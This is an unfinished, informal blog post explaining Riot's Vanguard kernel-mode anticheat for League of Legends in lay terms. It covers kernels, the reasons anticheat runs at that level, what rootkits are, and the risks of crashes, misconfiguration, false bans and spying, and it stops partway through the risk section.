UPDATE 24 August 2024: I never finished this. I don’t feel like erasing it before deploying something else to the site. Do whatever with it. Maybe I finish it, maybe I don’t.
On 1 May 2024, with patch 14.9, Riot deployed kernel-mode anticheat to League of Legends. This has made a lot of people very angry and been widely regarded as a bad move.
Various takes on the software sit almost exclusively on the extremes between “BUT CHINA!” and “BUT CHEATERS!” and are written by people with little-to-no IT experience.
This is an attempt to provide a somewhat-neutral overview of the software, its impact, the rollout, the potential risks, and potential mitigations. My hope is that you can make an informed decision for yourself, and feel comfortable referencing this document to others.
Technical explanations here are greatly simplified, and focused only on aspects that apply to Vanguard, its rollout, and its controversy.
If you are here because your computer has broken, the FIRST thing you should do is open a ticket on Riot’s support portal. This is so you can count towards the number of players reporting issues.
Skip to…
The Kernel
The Rationale
The Risk
The Rollout
The Fallout
The PR Job
“I’m not reading all of this!”
You don’t have to.
The tl;dr is that there’s a very very small, but never zero, chance that a vulnerability exists in Vanguard that can be used to take over computers. There is a significantly-higher risk that it won’t play well with certain hardware peripherals. The requirement that Vanguard starts with the system is controversial, and multiplies these downsides.
My recommendation is to run Vanguard on a clean machine with just games that require it.
I do not believe that Vanguard sets a good and healthy precedent. My guess is that streaming services will want their own kernel modules next. You will be told it’s to prevent piracy.
“Kernel, who?”
You can skip this if you’ve heard p much any other explanation on what a kernel is.
The kernel is, to put it simply, the lowest level of the operating system. It’s the lowest you can go before you’ve hit the hardware. In fact, the kernel is typically what’s responsible for working with the hardware itself. When applications fall to the ground and start convulsing, the kernel puts them out of their misery. It decides when programs run, it manages their requests for memory, and so much more.
In terms of permissions and what it can do, the kernel is God Himself. When applications have to do things like start network connections and open files, they don’t actually do that themselves. They ask the kernel to do it on their behalf. Even keypresses pass through the kernel.
Good practice is to keep code out of the kernel unless there’s a damn good reason for it to be there. This is for a few reasons, but the most important ones for today’s discussion are:
- Kernel code crashing takes out the rest of the system (A “blue screen”)
- Kernel code being vulnerable makes attackers Literally God.
This must be stressed. If there is a bug in kernel code, the best case scenario is a crash. The worst case scenario is complete system takeover.
This means that kernel code, ideally, is
- As minimal as possible, anything unecessary trimmed out or moved elsewhere
- Built to handle weird, strange conditions with grace
- Heavily tested to make sure it can handle being handed bullshit
tl;dr: The kernel is God. God can do anything. God can see everything. The kernel isn’t a part of the system, it creates the system.
“Why do games need to be there?”
You can skip this if you’ve heard p much any game developer discuss anticheat
Cheats either read a game’s memory, or make changes to it, in order to work.
The goal of anticheat is to either make this harder/impossible, or to catch something doing it. You can also scan the filesystem for things that might do it.
Any time an anticheat runs at a given “level” of a system, the natural next move of the cheat developer is to go deeper. The reason for this is because lower levels, generally, can lie to the higher ones.
For example, if the anticheat asks “Give me a list of code snippets that make up GuitarHeroRickAstleyEdition.exe”, a cheat running at a lower level than the anticheat can simply… not mention the code snippets that represent cheats.
Ideally, then, an anticheat would be at the lowest level possible, the kernel, where it cannot be lied to.
In theory. We’ll get into that later right now.
Vanguard is unusual among kernel-mode anticheats. While most (everything except Vanguard) of them only run with the game they protect, Vanguard starts with the system. The official rationale given for this is so it can monitor the boot process to ensure that nothing has started before it, that can then start lying.
For more information, you can read this somehow cringier than me official writeup from Riot head of anticheat Philip Koskinas. It is his job to sell Vanguard to you, not mine.
tl;dr: If anticheat isn’t in the kernel, it’ll get lied to by cheats that are. The cheat will tell the anticheat that the fire in the kitchen is, in fact, the northern lights.
“What is a rootkit?”
Don’t skip this. It’ll keep you from sounding stupid when you call shit a “rootkit”
A rootkit is, again to put it very simply, software that makes your computer lie to you.
That may sound dramatic, but let’s actually go into it. Normal malware might do something like inject ads into your system, log keystrokes, send your files elsewhere, steal passwords or cryptocurrency, etc. But at the end of the day, regardless of what a program does, it appears on a list of running processes, and you can find it on disk.
A rootkit, on the other hand, is something you’d use to hide something else. But how?
Operating systems offer specific methods for doing things like listing running processes, open network connections, files on disk, and so forth. A rootkit takes over these functions, and makes them return incorrect data. For example, if you have malware you want to hide with a rootkit, it might intercept a call for a list of running processes, and return a list that doesn’t mention the malware you are trying to hide.
At first, it may be obvious that rootkits need to be inside the kernel in order to be effective. This isn’t necessarily true! As long as a rootkit is part of software you are trying to lie to, it’s effective. Given that there are “base” snippets of code (called libraries) that all programs must call upon, if you can infect that “base”, you infect every program on the system, as they start.
You can also infect the part of the operating system (the “dynamic linker”) that actually puts all of the parts of a program together when it starts. An excellent example is the one of the OGs of that flavor of rootkit, Umbreon. (And I’m not just mentioning that one because my girlfriend wrote it!)
Is Vanguard a rootkit? There is currently no evidence that it does the things we normally associate with one.
However, I would like to point out that if you believe Vanguard is a rootkit, you will never prove it by using tools that are running on the machine. Tools like Task Manager and Wireshark would not show processes and traffic from a properly-designed rootkit.
tl;dr: A rootkit makes your computer gaslight you.
“What could possibly go wrong?”
You can skip this if you were going to dismiss literally anything I could possibly say anyway.
The potential problems generally fall into five categories, in descending order of probability:
- Oversights leading to crash bugs (blue screens)
- Oversights leading to misconfiguring the computer
- Oversights leading to false positives (false bans)
- Oversights leading to vulnerabilities in code running in the kernel
- Riot/Tencent/China spying on you
I’ll address the last one first: I genuinely think it’s unlikely that Vanguard will be used to spy on you. While Tencent has a significant finanical stake in Riot, all of the people in control are American citizens living in America. These are people who could be hauled in front of Congress or even jailed for mass-scale espionage. Being caught doing that would be career-ending. I’d imagine a lot of people involved would also voluntarily resign and blow the whistle.
It’s simply unlikely. If your primary argument against Vanguard is “CHINA!!!”, you’re stupid, and you’re making the rest of us look stupid, too.
On the flip side, if your only argument against those who don’t like Vanguard is that they’re paranoid or racist, you’re stupid. Just as stupid as those crying “CHINA!”
Vanguard is far more likely to break your Windows install or get innocent players banned.
Oversights leading to crash bugs (blue screens)
As I mentioned before, if code in the kernel crashes, the entire system goes down with it. This means that any code that someone introduces into the kernel needs to be robust. People writing kernel code need to be extremely careful, and they need to test their code across a wide range of hardware configurations.
UPDATE 24 August 2024: LMFAO NVM VANGUARD DOES THIS BETTER THAN FUCKING CROWDSTRIKE
Like I don’t even need to link you to a news article because literally everyone who isn’t Amish knows how bad CrowdStrike fucked up.
Oversights leading to misconfiguring the computer
These are the bugs that Riot is actually willing to admit to. In short, changing a setting to enable a feature required by Vanguard can expose an incompatibility between that feature and either the way the system was installed, or some piece of hardware.
Interestingly, the specific option causing this problem, “secure boot”, is not required by Vanguard when playing League. It just so happens that lots of players enabled this feature because they read somewhere that it might be a good idea. Sometimes, that somewhere was help documentation for Valorant, which has different requirements.
Like I said. Didn’t finish.